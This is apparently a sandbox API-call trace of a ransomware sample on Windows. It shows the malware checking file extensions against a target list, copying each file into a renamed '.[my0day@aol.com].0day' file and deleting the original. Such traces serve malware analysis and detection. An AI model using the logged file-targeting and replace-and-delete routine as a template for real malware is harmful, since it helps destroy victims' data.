-1 [0034.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.829] lstrlenW (lpString=".zip") returned 4 [0034.829] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.829] lstrlenW (lpString=".rar") returned 4 [0034.829] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString=".bz2") returned 4 [0034.829] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString=".7z") returned 3 [0034.829] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.829] lstrlenW (lpString=".dbf") returned 4 [0034.829] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.829] lstrlenW (lpString=".1cd") returned 4 [0034.829] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.829] lstrlenW (lpString=".jpg") returned 4 [0034.829] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.829] lstrlenW (lpString=".doc") returned 4 [0034.829] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString=".docx") returned 5 [0034.829] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.830] lstrlenW (lpString=".pdf") returned 4 [0034.830] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString=".xls") returned 4 [0034.830] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString=".xlsx") returned 5 [0034.830] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.830] lstrlenW (lpString=".ppt") returned 4 [0034.830] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.830] lstrlenW (lpString=".zip") returned 4 [0034.830] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.830] lstrlenW (lpString=".rar") returned 4 [0034.830] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString=".bz2") returned 4 [0034.830] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString=".7z") returned 3 [0034.830] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.830] lstrlenW (lpString=".dbf") returned 4 [0034.830] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.830] lstrlenW (lpString=".1cd") returned 4 [0034.830] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.830] lstrlenW (lpString=".jpg") returned 4 [0034.830] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.830] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.830] lstrlenW (lpString="OfficeMUISet.xml") returned 16 [0034.830] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.831] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=819) returned 1 [0034.831] CloseHandle (hObject=0x188) returned 1 [0034.831] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020 [0034.831] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.831] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.831] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.831] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.831] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.831] GetLastError () returned 0x0 [0034.832] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x333, lpOverlapped=0x0) returned 1 [0034.833] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x340, lpOverlapped=0x0) returned 1 [0034.834] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.834] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0034.834] SetEndOfFile (hFile=0x198) returned 1 [0034.834] CloseHandle (hObject=0x198) returned 1 [0034.835] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.835] SetEndOfFile (hFile=0x188) returned 1 [0034.836] CloseHandle (hObject=0x188) returned 1 [0034.836] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.836] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.836] lstrlenW (lpString=".doc") returned 4 [0034.836] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString=".docx") returned 5 [0034.836] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0034.836] lstrlenW (lpString=".pdf") returned 4 [0034.836] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString=".xls") returned 4 [0034.836] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString=".xlsx") returned 5 [0034.836] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0034.836] lstrlenW (lpString=".ppt") returned 4 [0034.836] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.836] lstrlenW (lpString=".zip") returned 4 [0034.837] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.837] lstrlenW (lpString=".rar") returned 4 [0034.837] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString=".bz2") returned 4 [0034.837] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString=".7z") returned 3 [0034.837] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.837] lstrlenW (lpString=".dbf") returned 4 [0034.837] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.837] lstrlenW (lpString=".1cd") returned 4 [0034.837] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.837] lstrlenW (lpString=".jpg") returned 4 [0034.837] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.837] lstrlenW (lpString=".doc") returned 4 [0034.837] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString=".docx") returned 5 [0034.837] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0034.837] lstrlenW (lpString=".pdf") returned 4 [0034.837] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString=".xls") returned 4 [0034.837] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString=".xlsx") returned 5 [0034.837] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0034.837] lstrlenW (lpString=".ppt") returned 4 [0034.837] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.837] lstrlenW (lpString=".zip") returned 4 [0034.837] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.837] lstrlenW (lpString=".rar") returned 4 [0034.838] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.838] lstrlenW (lpString=".bz2") returned 4 [0034.838] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.838] lstrlenW (lpString=".7z") returned 3 [0034.838] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.838] lstrlenW (lpString=".dbf") returned 4 [0034.838] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.838] lstrlenW (lpString=".1cd") returned 4 [0034.838] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.838] lstrlenW (lpString=".jpg") returned 4 [0034.838] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.838] lstrcmpiW (lpString1=".chm", lpString2=".0day") returned 1 [0034.838] lstrlenW (lpString="pss10r.chm") returned 10 [0034.838] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.839] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=27195) returned 1 [0034.839] CloseHandle (hObject=0x188) returned 1 [0034.839] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020 [0034.839] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.839] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.840] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.840] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.840] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.840] GetLastError () returned 0x0 [0034.840] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0034.842] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0034.843] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.843] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0034.843] SetEndOfFile (hFile=0x198) returned 1 [0034.843] CloseHandle (hObject=0x198) returned 1 [0034.844] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.844] SetEndOfFile (hFile=0x188) returned 1 [0034.845] CloseHandle (hObject=0x188) returned 1 [0034.845] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.845] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1 [0034.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.845] lstrlenW (lpString=".doc") returned 4 [0034.845] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0034.845] lstrlenW (lpString=".docx") returned 5 [0034.845] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0034.845] lstrlenW (lpString=".pdf") returned 4 [0034.845] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".xls") returned 4 [0034.846] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".xlsx") returned 5 [0034.846] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0034.846] lstrlenW (lpString=".ppt") returned 4 [0034.846] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.846] lstrlenW (lpString=".zip") returned 4 [0034.846] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".rar") returned 4 [0034.846] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".bz2") returned 4 [0034.846] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0034.846] lstrlenW (lpString=".7z") returned 3 [0034.846] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0034.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.846] lstrlenW (lpString=".dbf") returned 4 [0034.846] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.846] lstrlenW (lpString=".1cd") returned 4 [0034.846] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0034.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.846] lstrlenW (lpString=".jpg") returned 4 [0034.846] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.846] lstrlenW (lpString=".doc") returned 4 [0034.846] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".docx") returned 5 [0034.846] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0034.846] lstrlenW (lpString=".pdf") returned 4 [0034.846] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".xls") returned 4 [0034.846] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0034.846] lstrlenW (lpString=".xlsx") returned 5 [0034.847] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0034.847] lstrlenW (lpString=".ppt") returned 4 [0034.847] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0034.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.847] lstrlenW (lpString=".zip") returned 4 [0034.847] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0034.847] lstrlenW (lpString=".rar") returned 4 [0034.847] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0034.847] lstrlenW (lpString=".bz2") returned 4 [0034.847] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0034.847] lstrlenW (lpString=".7z") returned 3 [0034.847] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0034.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.847] lstrlenW (lpString=".dbf") returned 4 [0034.847] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0034.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.847] lstrlenW (lpString=".1cd") returned 4 [0034.847] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0034.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.847] lstrlenW (lpString=".jpg") returned 4 [0034.847] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0034.847] lstrcmpiW (lpString1=".chm", lpString2=".0day") returned 1 [0034.847] lstrlenW (lpString="setup.chm") returned 9 [0034.847] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.848] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=67190) returned 1 [0034.848] CloseHandle (hObject=0x188) returned 1 [0034.848] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020 [0034.848] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.848] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.848] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.848] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.848] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.848] GetLastError () returned 0x0 [0034.848] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x10676, lpOverlapped=0x0) returned 1 [0035.084] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x10680, lpOverlapped=0x0) returned 1 [0035.651] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.651] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.651] SetEndOfFile (hFile=0x198) returned 1 [0035.651] CloseHandle (hObject=0x198) returned 1 [0035.658] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.658] SetEndOfFile (hFile=0x188) returned 1 [0035.659] CloseHandle (hObject=0x188) returned 1 [0035.659] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.659] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1 [0035.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.660] lstrlenW (lpString=".doc") returned 4 [0035.660] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString=".docx") returned 5 [0035.660] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0035.660] lstrlenW (lpString=".pdf") returned 4 [0035.660] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString=".xls") returned 4 [0035.660] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0035.660] lstrlenW (lpString=".xlsx") returned 5 [0035.660] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 